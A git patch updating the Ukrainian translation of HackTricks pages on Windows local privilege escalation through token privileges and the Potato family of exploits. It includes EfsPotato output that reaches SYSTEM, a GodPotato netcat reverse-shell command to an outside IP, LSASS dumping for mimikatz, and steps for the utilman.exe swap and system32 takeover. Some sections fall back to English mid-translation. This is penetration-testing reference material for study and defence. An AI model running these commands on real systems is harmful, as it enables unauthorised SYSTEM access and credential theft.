From cd4742ae8f34740fb1faadbe5061e1aa8eaa9aeb Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 30 Jul 2024 11:11:20 +0000 Subject: [PATCH] Translated ['windows-hardening/windows-local-privilege-escalation/privil --- .../README.md | 62 +++++++++---------- .../roguepotato-and-printspoofer.md | 45 +++++++++++--- 2 files changed, 66 insertions(+), 41 deletions(-) diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md index bec8a12dd..c588ace3a 100644 --- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md +++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md @@ -6,7 +6,7 @@
-Підтримайте HackTricks +Підтримка HackTricks * Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! * **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** @@ -27,7 +27,7 @@ ### SeImpersonatePrivilege -Це привілей, який має будь-який процес, що дозволяє зловживання (але не створення) будь-яким токеном, якщо можна отримати дескриптор до нього. Привілейований токен можна отримати з Windows-сервісу (DCOM), спонукаючи його виконати NTLM-аутентифікацію проти експлойту, що дозволяє виконання процесу з привілеями SYSTEM. Цю вразливість можна експлуатувати за допомогою різних інструментів, таких як [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (який вимагає, щоб winrm був вимкнений), [SweetPotato](https://github.com/CCob/SweetPotato) та [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). +Це привілей, який має будь-який процес, що дозволяє зловживання (але не створення) будь-яким токеном, якщо можна отримати дескриптор до нього. Привілейований токен можна отримати з Windows-сервісу (DCOM), спонукаючи його виконати NTLM-аутентифікацію проти експлойту, що дозволяє виконання процесу з привілеями SYSTEM. Цю вразливість можна експлуатувати за допомогою різних інструментів, таких як [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (який вимагає, щоб winrm був вимкнений), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato), [DCOMPotato](https://github.com/zcgonvh/DCOMPotato) та [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). {% content-ref url="../roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../roguepotato-and-printspoofer.md) @@ -49,13 +49,13 @@ ### SeBackupPrivilege -Цей привілей дозволяє системі **надавати всі права на читання** для будь-якого файлу (обмежено до операцій читання). Він використовується для **читання хешів паролів локальних облікових записів адміністратора** з реєстру, після чого можна використовувати такі інструменти, як "**psexec**" або "**wmiexec**" з хешем (техніка Pass-the-Hash). Однак ця техніка не спрацьовує за двох умов: коли обліковий запис локального адміністратора вимкнено або коли діє політика, яка позбавляє адміністративних прав локальних адміністраторів, які підключаються віддалено.\ +Цей привілей змушує систему **надавати весь доступ для читання** до будь-якого файлу (обмеженого операціями читання). Він використовується для **читання хешів паролів локальних облікових записів адміністратора** з реєстру, після чого інструменти, такі як "**psexec**" або "**wmiexec**", можуть бути використані з хешем (техніка Pass-the-Hash). Однак ця техніка не працює за двох умов: коли обліковий запис локального адміністратора вимкнено або коли існує політика, яка позбавляє адміністративних прав локальних адміністраторів, які підключаються віддалено.\ Ви можете **зловживати цим привілеєм** за допомогою: * [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) * [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) -* слідуючи **IppSec** на [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec) -* Або, як пояснено в розділі **підвищення привілеїв з операторами резервного копіювання**: +* слідуючи **IppSec** в [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec) +* Або, як пояснено в розділі **підвищення привілеїв з резервними операторами**: {% content-ref url="../../active-directory-methodology/privileged-groups-and-token-privileges.md" %} [privileged-groups-and-token-privileges.md](../../active-directory-methodology/privileged-groups-and-token-privileges.md) @@ -78,13 +78,13 @@ SeCreateTokenPrivilege є потужним дозволом, особливо к Цей привілей дозволяє **завантажувати та вивантажувати драйвери пристроїв** шляхом створення запису в реєстрі з конкретними значеннями для `ImagePath` та `Type`. Оскільки прямий доступ на запис до `HKLM` (HKEY_LOCAL_MACHINE) обмежений, потрібно використовувати `HKCU` (HKEY_CURRENT_USER). Однак, щоб зробити `HKCU` впізнаваним для ядра для конфігурації драйвера, потрібно дотримуватися певного шляху. -Цей шлях: `\Registry\User\\System\CurrentControlSet\Services\DriverName`, де `` - це відносний ідентифікатор поточного користувача. У `HKCU` потрібно створити цей весь шлях і встановити два значення: +Цей шлях: `\Registry\User\\System\CurrentControlSet\Services\DriverName`, де `` є відносним ідентифікатором поточного користувача. Всередині `HKCU` потрібно створити цей весь шлях і встановити два значення: - `ImagePath`, що є шляхом до виконуваного бінарного файлу - `Type`, зі значенням `SERVICE_KERNEL_DRIVER` (`0x00000001`). **Кроки для виконання:** 1. Доступ до `HKCU` замість `HKLM` через обмежений доступ на запис. -2. Створити шлях `\Registry\User\\System\CurrentControlSet\Services\DriverName` у `HKCU`, де `` представляє відносний ідентифікатор поточного користувача. +2. Створити шлях `\Registry\User\\System\CurrentControlSet\Services\DriverName` в `HKCU`, де `` представляє відносний ідентифікатор поточного користувача. 3. Встановити `ImagePath` на шлях виконання бінарного файлу. 4. Призначити `Type` як `SERVICE_KERNEL_DRIVER` (`0x00000001`). ```python @@ -102,7 +102,7 @@ reg.CloseKey(key) ### SeTakeOwnershipPrivilege -Це схоже на **SeRestorePrivilege**. Його основна функція дозволяє процесу **приймати власність на об'єкт**, обходячи вимогу явного дискреційного доступу шляхом надання прав доступу WRITE_OWNER. Процес включає спочатку отримання власності на запланований ключ реєстру для запису, а потім зміну DACL для дозволу операцій запису. +Це схоже на **SeRestorePrivilege**. Його основна функція дозволяє процесу **приймати власність на об'єкт**, обходячи вимогу явного дискреційного доступу через надання прав доступу WRITE_OWNER. Процес включає спочатку отримання власності на запланований ключ реєстру для запису, а потім зміну DACL для дозволу операцій запису. ```bash takeown /f 'C:\some\file.txt' #Now the file is owned by you icacls 'C:\some\file.txt' /grant :F #Now you have full access @@ -124,7 +124,7 @@ c:\inetpub\wwwwroot\web.config #### Dump memory -Ви можете використовувати [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) з [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite), щоб **захопити пам'ять процесу**. Зокрема, це може стосуватися процесу **Local Security Authority Subsystem Service ([LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service))**, який відповідає за зберігання облікових даних користувача після успішного входу користувача в систему. +Ви можете використовувати [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) з [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite), щоб **захопити пам'ять процесу**. Зокрема, це може стосуватися процесу **Local Security Authority Subsystem Service ([LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service))**, який відповідає за зберігання облікових даних користувача після успішного входу в систему. Потім ви можете завантажити цей дамп у mimikatz, щоб отримати паролі: ``` @@ -152,44 +152,44 @@ whoami /priv ### Увімкнути всі токени -Якщо у вас є токени, що вимкнені, ви можете використовувати скрипт [**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) для увімкнення всіх токенів: +Якщо у вас є вимкнені токени, ви можете використовувати скрипт [**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) для увімкнення всіх токенів: ```powershell .\EnableAllTokenPrivs.ps1 whoami /priv ``` -Або **скрипт**, вбудований у цей [**пост**](https://www.leeholmes.com/adjusting-token-privileges-in-powershell/). +Or the **script** embed in this [**post**](https://www.leeholmes.com/adjusting-token-privileges-in-powershell/). -## Таблиця +## Table -Повна таблиця привілеїв токенів доступна за посиланням [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), нижче наведено лише прямі способи експлуатації привілеїв для отримання адміністративної сесії або читання чутливих файлів. +Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files. -| Привілей | Вплив | Інструмент | Шлях виконання | Примітки | +| Privilege | Impact | Tool | Execution path | Remarks | | -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| **`SeAssignPrimaryToken`** | _**Адмін**_ | сторонній інструмент | _"Це дозволить користувачу імітувати токени та підвищити привілеї до системи NT, використовуючи такі інструменти, як potato.exe, rottenpotato.exe та juicypotato.exe"_ | Дякую [Aurélien Chalot](https://twitter.com/Defte\_) за оновлення. Я спробую перефразувати це на щось більш схоже на рецепт найближчим часом. | -| **`SeBackup`** | **Загроза** | _**Вбудовані команди**_ | Читати чутливі файли за допомогою `robocopy /b` |

- Може бути більш цікавим, якщо ви можете прочитати %WINDIR%\MEMORY.DMP

- SeBackupPrivilege (і robocopy) не допомагають, коли йдеться про відкриті файли.

- Robocopy вимагає як SeBackup, так і SeRestore для роботи з параметром /b.

| -| **`SeCreateToken`** | _**Адмін**_ | сторонній інструмент | Створити довільний токен, включаючи права локального адміністратора, за допомогою `NtCreateToken`. | | -| **`SeDebug`** | _**Адмін**_ | **PowerShell** | Дублювати токен `lsass.exe`. | Скрипт можна знайти на [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | -| **`SeLoadDriver`** | _**Адмін**_ | сторонній інструмент |

1. Завантажити помилковий драйвер ядра, наприклад szkg64.sys
2. Використати вразливість драйвера

Альтернативно, привілей може бути використаний для вивантаження драйверів, пов'язаних із безпекою, за допомогою вбудованої команди ftlMC. Тобто: fltMC sysmondrv

|

1. Вразливість szkg64 вказана як CVE-2018-15732
2. szkg64 код експлуатації був створений Parvez Anwar

| -| **`SeRestore`** | _**Адмін**_ | **PowerShell** |

1. Запустіть PowerShell/ISE з присутнім привілеєм SeRestore.
2. Увімкніть привілей за допомогою Enable-SeRestorePrivilege.
3. Перейменуйте utilman.exe в utilman.old
4. Перейменуйте cmd.exe в utilman.exe
5. Заблокуйте консоль і натисніть Win+U

|

Атаку можуть виявити деякі антивірусні програми.

Альтернативний метод ґрунтується на заміні бінарних файлів служб, збережених у "Program Files", використовуючи той же привілей.

| -| **`SeTakeOwnership`** | _**Адмін**_ | _**Вбудовані команди**_ |

1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Перейменуйте cmd.exe в utilman.exe
4. Заблокуйте консоль і натисніть Win+U

|

Атаку можуть виявити деякі антивірусні програми.

Альтернативний метод ґрунтується на заміні бінарних файлів служб, збережених у "Program Files", використовуючи той же привілей.

| -| **`SeTcb`** | _**Адмін**_ | сторонній інструмент |

Маніпулювати токенами, щоб включити права локального адміністратора. Може вимагати SeImpersonate.

Потрібно перевірити.

| | +| **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool | _"Це дозволить користувачу імітувати токени та підвищити привілеї до системи nt, використовуючи такі інструменти, як potato.exe, rottenpotato.exe та juicypotato.exe"_ | Thank you [Aurélien Chalot](https://twitter.com/Defte\_) for the update. I will try to re-phrase it to something more recipe-like soon. | +| **`SeBackup`** | **Threat** | _**Built-in commands**_ | Читати чутливі файли за допомогою `robocopy /b` |

- Може бути більш цікавим, якщо ви можете прочитати %WINDIR%\MEMORY.DMP

- SeBackupPrivilege (і robocopy) не допомагають, коли йдеться про відкриті файли.

- Robocopy вимагає як SeBackup, так і SeRestore для роботи з параметром /b.

| +| **`SeCreateToken`** | _**Admin**_ | 3rd party tool | Створити довільний токен, включаючи права локального адміністратора, за допомогою `NtCreateToken`. | | +| **`SeDebug`** | _**Admin**_ | **PowerShell** | Дублювати токен `lsass.exe`. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | +| **`SeLoadDriver`** | _**Admin**_ | 3rd party tool |

1. Завантажити помилковий драйвер ядра, такий як szkg64.sys
2. Використати вразливість драйвера

Альтернативно, привілей може бути використаний для вивантаження драйверів, пов'язаних із безпекою, за допомогою вбудованої команди ftlMC. тобто: fltMC sysmondrv

|

1. Вразливість szkg64 вказана як CVE-2018-15732
2. szkg64 код експлуатації був створений Parvez Anwar

| +| **`SeRestore`** | _**Admin**_ | **PowerShell** |

1. Запустіть PowerShell/ISE з присутнім привілеєм SeRestore.
2. Увімкніть привілей за допомогою Enable-SeRestorePrivilege).
3. Перейменуйте utilman.exe в utilman.old
4. Перейменуйте cmd.exe в utilman.exe
5. Заблокуйте консоль і натисніть Win+U

|

Атаку можуть виявити деякі антивірусні програми.

Альтернативний метод ґрунтується на заміні бінарних файлів служб, збережених у "Program Files", використовуючи той же привілей

| +| **`SeTakeOwnership`** | _**Admin**_ | _**Built-in commands**_ |

1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Перейменуйте cmd.exe в utilman.exe
4. Заблокуйте консоль і натисніть Win+U

|

Атаку можуть виявити деякі антивірусні програми.

Альтернативний метод ґрунтується на заміні бінарних файлів служб, збережених у "Program Files", використовуючи той же привілей.

| +| **`SeTcb`** | _**Admin**_ | 3rd party tool |

Маніпулювати токенами, щоб включити права локального адміністратора. Може вимагати SeImpersonate.

Потрібно перевірити.

| | -## Посилання +## Reference -* Ознайомтеся з цією таблицею, що визначає токени Windows: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin) -* Ознайомтеся з [**цією статтею**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) про підвищення привілеїв за допомогою токенів. +* Take a look to this table defining Windows tokens: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin) +* Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) about privesc with tokens. {% hint style="success" %} -Вчіться та практикуйте AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Вчіться та практикуйте GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Підтримати HackTricks +Support HackTricks -* Перегляньте [**плани підписки**](https://github.com/sponsors/carlospolop)! -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Діліться хакерськими трюками, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index b64c9d78c..3ff54930c 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -19,9 +19,9 @@ Learn & practice GCP Hacking:
-[**WhiteIntel**](https://whiteintel.io) є **dark-web** пошуковою системою, яка пропонує **безкоштовні** функції для перевірки, чи була компанія або її клієнти **компрометовані** **stealer malwares**. +[**WhiteIntel**](https://whiteintel.io) - це **пошукова система** на основі **темного вебу**, яка пропонує **безкоштовні** функції для перевірки, чи була компанія або її клієнти **скомпрометовані** **шкідливими програмами-крадіями**. -Їхня основна мета - боротися з захопленням облікових записів та атаками програм-вимагачів, що виникають внаслідок шкідливого програмного забезпечення, що краде інформацію. +Основна мета WhiteIntel - боротися з захопленням облікових записів та атаками програм-вимагачів, що виникають внаслідок шкідливих програм, що крадуть інформацію. Ви можете перевірити їхній вебсайт і спробувати їхній двигун **безкоштовно** за адресою: @@ -30,7 +30,7 @@ Learn & practice GCP Hacking: SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. @@ -77,13 +77,36 @@ df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: [+] Process created, enjoy! C:\temp>type C:\temp\w.log +nt authority\system +``` +### EfsPotato +```bash +> EfsPotato.exe "whoami" +Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). +Part of GMH's fuck Tools, Code By zcgonvh. +CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] + +[+] Current user: NT Service\MSSQLSERVER +[+] Pipe: \pipe\lsarpc +[!] binding ok (handle=aeee30) +[+] Get Token: 888 +[!] process with pid: 3696 created. +============================== +[x] EfsRpcEncryptFileSrv failed: 1818 + nt authority\system ``` ### GodPotato +```bash +> GodPotato -cmd "cmd /c whoami" +# You can achieve a reverse shell like this. +> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` -GodPotato -cmd "cmd /c whoami" -GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" -``` +### DCOMPotato + +![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) + + ## References * [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) @@ -91,14 +114,16 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" * [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) +* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) +* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) ### [WhiteIntel](https://whiteintel.io)
-[**WhiteIntel**](https://whiteintel.io) - це **пошукова система** на основі **темного вебу**, яка пропонує **безкоштовні** функції для перевірки, чи була компанія або її клієнти **компрометовані** **шкідливими програмами-крадіями**. +[**WhiteIntel**](https://whiteintel.io) є **пошуковою системою** на основі **темного вебу**, яка пропонує **безкоштовні** функції для перевірки, чи була **компанія** або її **клієнти** **скомпрометовані** **шкідливими програмами** для крадіжки даних. -Основна мета WhiteIntel - боротися з захопленням облікових записів та атаками програм-вимагачів, що виникають внаслідок шкідливих програм, які крадуть інформацію. +Основна мета WhiteIntel - боротися з захопленням облікових записів та атаками програм-вимагачів, що виникають внаслідок шкідливих програм для крадіжки інформації. Ви можете перевірити їхній вебсайт і спробувати їхній двигун **безкоштовно** за адресою: